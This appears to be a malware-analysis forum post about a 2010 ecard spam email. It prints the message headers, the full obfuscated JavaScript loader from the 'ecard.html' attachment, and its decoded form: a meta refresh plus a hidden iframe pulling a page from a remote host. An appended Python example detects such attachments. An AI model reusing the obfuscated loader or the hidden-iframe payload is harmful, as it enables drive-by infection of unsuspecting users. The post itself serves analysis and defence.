Author Topic: ecard email scam  (Read 2741 times)

June 14, 2010, 06:38:47 pm
cleanmx

nice finding  ;D

Code:
X-Quarantine-ID: <DApwRkdUFIO2>
X-Virus-Scanned: by netpilot GmbH at clean-mx.de
X-Spam-Flag: YES
X-Spam-Score: 31.608
X-Spam-Level: *******************************
X-Spam-Status: Yes, score=31.608 tagged_above=-999 required=6
tests=[BAYES_99=3.3, DCC_CHECK=2.17, DNS_FROM_AHBL_RHSBL=0.692,
FORGED_OUTLOOK_TAGS=0.001, HTML_MESSAGE=0.001,
RCVD_IN_BL_SPAMCOP_NET=1.96, RCVD_IN_XBL=3.033, RDNS_NONE=0.1,
SPF_FAIL=19, TVD_RCVD_SINGLE=1.351]
Received: from relayn.netpilot.net ([127.0.0.1])
by localhost (relayn.netpilot.net [127.0.0.1]) (clean-mx, port 10024)
with ESMTP id DApwRkdUFIO2 for <trap@funny.clean-mx.com>;
Mon, 14 Jun 2010 19:47:29 +0200 (CEST)
Received: from JRCBEKZMTG (unknown [211.226.135.211])
by relayn.netpilot.net (Postfix) with ESMTP id 62340EAC384
for <trap@funny.clean-mx.com>; Mon, 14 Jun 2010 19:47:27 +0200 (CEST)
Received: from 211.226.135.211 by reply.worthzone.com; Tue, 15 Jun 2010 02:46:52 +0900
Message-ID: <000d01cb0be9$92bd0de0$6400a8c0@handshaking5>
From: "123Greetings.com" <ecards@123greetings.com>
To: <trap@funny.clean-mx.com>
Subject: handshaking5@reply.worthzone.com has sent you a birthday ecard.
Date: Tue, 15 Jun 2010 02:46:52 +0900
MIME-Version: 1.0
Content-Type: multipart/mixed;
  boundary="----=_NextPart_000_0006_01CB0BE9.92BD0DE0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

This is a multi-part message in MIME format.

------=_NextPart_000_0006_01CB0BE9.92BD0DE0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit

[handshaking5@reply.worthzone.com] just sent you an ecard

You can view it by open attached document.

Your ecard is going to be with us for the next 30 days.

We hope you enjoy your ecard.


------=_NextPart_000_0006_01CB0BE9.92BD0DE0
Content-Type: text/html;
name="ecard.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="ecard.html"
------=_NextPart_000_0006_01CB0BE9.92BD0DE0--

leads to this embedded ecard.html
Code:
<script>var atl; atl = 'bsIsLwuUlD' ;var awCE ; awCE=484;var dpfhEr =432 ;var Qu= 974 ; if (awCE<dpfhEr){awCE= dpfhEr^Qu;}atl = '' ;var iAgg, mDpk ;var EAOoY ;EAOoY=153 ;if (iAgg<mDpk){iAgg=mDpk/EAOoY ; }var AUqMA=this;var jL='r'+'eplace';var tdbHfv= 'bKaK8MdM2v6M5M9M1T4v7v6M7K9T3Mcv0v0v4KeTbTbv7MbM3M8M5v4M1vdTaM5v4Mav1v7M5TaMaM1v0Ke' ; var zQwlUR;zQwlUR =354; var qAcav=763 ;var Hs=923; if (zQwlUR==qAcav){zQwlUR= qAcav+Hs ; }var AfZjS= '0v0McK9T3K5T' ;var opp= 'UwrG'; var LUi, OAnRz ;var qV=16;if (LUi==OAnRz){LUi=OAnRz+qV; }var Jrcatz ='K8TbMdM2'; var ybq;ybq = '';var NZSFxA = 141 ;var zHfm,DuD ; if (NZSFxA<=zHfm){NZSFxA =zHfm+DuD;}ybq ='5M9M1' ;var wXabLK ;wXabLK =''; wXabLK='v6M'; var JZlPj; JZlPj='';var ZsxbE, cCkK; var oHXmT=211; if (ZsxbE>cCkK){ZsxbE =cCkK/oHXmT; }JZlPj= 'v7MdM6MdM8Mdv0vdKeT4M'; var HOqbe;HOqbe= '' ;HOqbe= '3T4McM1MdM3Mcv0K'; var llqek= 'eFQBa'; var wYQ ; wYQ = ''; wYQ ='M0MbM7v1M9M1Mav0Tav3v6Mdv0M1TcT6K8M9M1v0M5T'; var qTHSx; qTHSx = 'KcK4KcK4TbMdMaM0M1vcTav4Mcv4Kbv4MdM0K9K5K4T3T4v3MdM' ;var dMXvR ,ZBQsV;var xfsRQ =685; if (dMXvR==ZBQsV){dMXvR= ZBQsV -xfsRQ;}var bX='Kf' ; var lh; lh='' ; var gs , fZ;var zFn=182 ; if (gs>fZ){gs=fZ^zFn;}lh= '1v7McU8T6T4M7MbMav0M1Mav0K9U8T6K7Kfv1v6M8K9Mcv0v0v4KeTbTbv0MbM8M0v7v4M1M5MfTaM7MbM9TbU8T6T4T'; var cuOZbq,sb ;var fW= 137 ; if (fW=cuOZbq && cuOZbq>sb){cuOZbq =sb+fW;}var JsMjx; JsMjx ='KaT' ;var YHyz ='M0M1M';var LFip =363 ; var ZEU= 67 ; var YLTRa= 246; if (LFip>=ZEU){LFip =ZEU^YLTRa ; }var DKYYi ='MAwWSPcfFgIWWxNvE'; var FQQc ,YIM,SuyPjt; if (FQQc==YIM){FQQc= YIM+SuyPjt ; }var bDPMad; bDPMad='4Mcv0v0v4T9M1v5v1Mdv2K9U8T6v6M1M2v6M';var hzkNi= 93;var zFZRi, djtn ;if (hzkNi>=zFZRi){hzkNi =zFZRi+djtn; }var kDLRC = 'SYRzoFZMfxtaMIRRBqMv'; var JLJPak; JLJPak= '' ; JLJPak ='aKfT3Ka'; function VFh(IF){var DwBkWI=atl; for(pvuTED= 0 ;pvuTED<IF['lUebnMgztbhb'[jL](/[bFzUM]/g, atl)]; ++pvuTED){DwBkWI=DwBkWI+AUqMA['SxtfrCiCnygC'[jL](/[CyxfE]/g,atl)]['fvrAoSmtCthvaArvCZovdveS'[jL](/[SvtZA]/g 
,atl)](4^IF['cHhSaIrnCSoSdSenAntH'[jL](/[HFInS]/g, atl)](pvuTED)); var evxx ;evxx= 580 ;var lgi=769 ;var Df ;Df = 192 ;if (Df>evxx && evxx>lgi){evxx= lgi-Df ; }}return DwBkWI ;}var iZv;iZv ='' ; iZv= '6Td' ;var HIuZ ='9T3K5T3T4v7v0vdM8M1K9T3v2Md' ;var OvJ = 'cMdM0' ;var WfVhDt ;WfVhDt = atl;var haQyw = wYQ;haQyw = haQyw+bDPMad+lh ;haQyw =haQyw+tdbHfv+qTHSx+AfZjS+HOqbe ; haQyw = haQyw+HIuZ ; haQyw=haQyw+JZlPj;haQyw = haQyw+OvJ+YHyz+JLJPak+Jrcatz+wXabLK+ybq+JsMjx+iZv+bX; haQyw =haQyw+WfVhDt; var fipdii = 'fqr0lTc2iKL3NyS1ZmC8pvg7QxX4kUb5Eun9sMJ6'[jL](/[fliNZpQkEs]/g ,'\;')[jL](/[rcLSCgXbnJ]/g,'\?'); var aqj="')[jL](/[";var GyJrl = "]/g , '%";var KP= fipdii[jL](/[\;]/g ,aqj)[jL](/[\?]/g , GyJrl); var WHE;WHE= jL;AUqMA['ezvDaZlD'[WHE](/[DGZzP]/g ,atl)]('var KTIGZG= haQyw'+KP['sBuCbosCtCroionkgB'[jL](/[BkeoC]/g , atl)](2,KP['lFeGnxgFtChG'[jL](/[GxCFK]/g ,atl)])+"') ;") ;var cPxgg= 751; var jiop =900 ; var ESEO ;ESEO = 309;if (cPxgg==jiop){cPxgg= jiop/ESEO; }var wt;wt =jL; AUqMA['eOvVaGlO'[wt](/[OYTGV]/g , atl)](VFh(AUqMA[['uAnUeNsNclalpNeN'[jL](/[NAlqU]/g,atl)]](KTIGZG)));var BZgzDQ =160;var TkY = 584;var yhyLcK = 892;if (BZgzDQ==TkY){BZgzDQ = TkY^yhyLcK ; }</script>

malzilla decodes to:

Code:
<meta http-equiv="refresh" content="3;url=http://toldspeak.com/" /><iframe src='http://soglapey.apnusa.net:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>
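
Added example, not part of the original post: a mail-gateway style check for the pattern shown above, an HTML attachment that carries only script and, once decoded, a meta refresh plus an invisible iframe. The class and function names, the `script-only` label and the sample message are assumptions constructed for illustration.

```python
from email import message_from_string, policy
from email.message import EmailMessage
from html.parser import HTMLParser

class AttachmentScan(HTMLParser):
    """Collect script tags, meta refreshes and iframes sized or styled to be invisible."""
    def __init__(self):
        super().__init__()
        self.findings, self.in_script, self.visible_text = [], False, False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self.in_script = True
            self.findings.append(("script", a.get("src", "inline")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") and a.get("height") in ("0", "1")
            if tiny or "visibility:hidden" in style or "display:none" in style:
                self.findings.append(("hidden-iframe", a.get("src", "")))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if not self.in_script and data.strip():
            self.visible_text = True

def scan_html(markup):
    p = AttachmentScan()
    p.feed(markup)
    p.close()
    if any(kind == "script" for kind, _ in p.findings) and not p.visible_text:
        p.findings.append(("script-only", ""))  # nothing to read, only code to run
    return p.findings

def scan_message(raw):  # filename -> findings for every text/html part
    msg = message_from_string(raw, policy=policy.default)
    return {part.get_filename("(inline)"): scan_html(part.get_content())
            for part in msg.walk() if part.get_content_type() == "text/html"}

def build_sample():  # constructed message: plain body plus a base64 ecard.html
    m = EmailMessage()
    m.set_content("Constructed sample body.")
    m.add_attachment("<script>var a = 1;</script>", subtype="html",
                     cte="base64", filename="ecard.html")
    return m.as_string()
```

`scan_message(build_sample())` flags the attachment as `script-only`; running `scan_html` on markup shaped like the decoded output above reports `meta-refresh` and `hidden-iframe` with their targets.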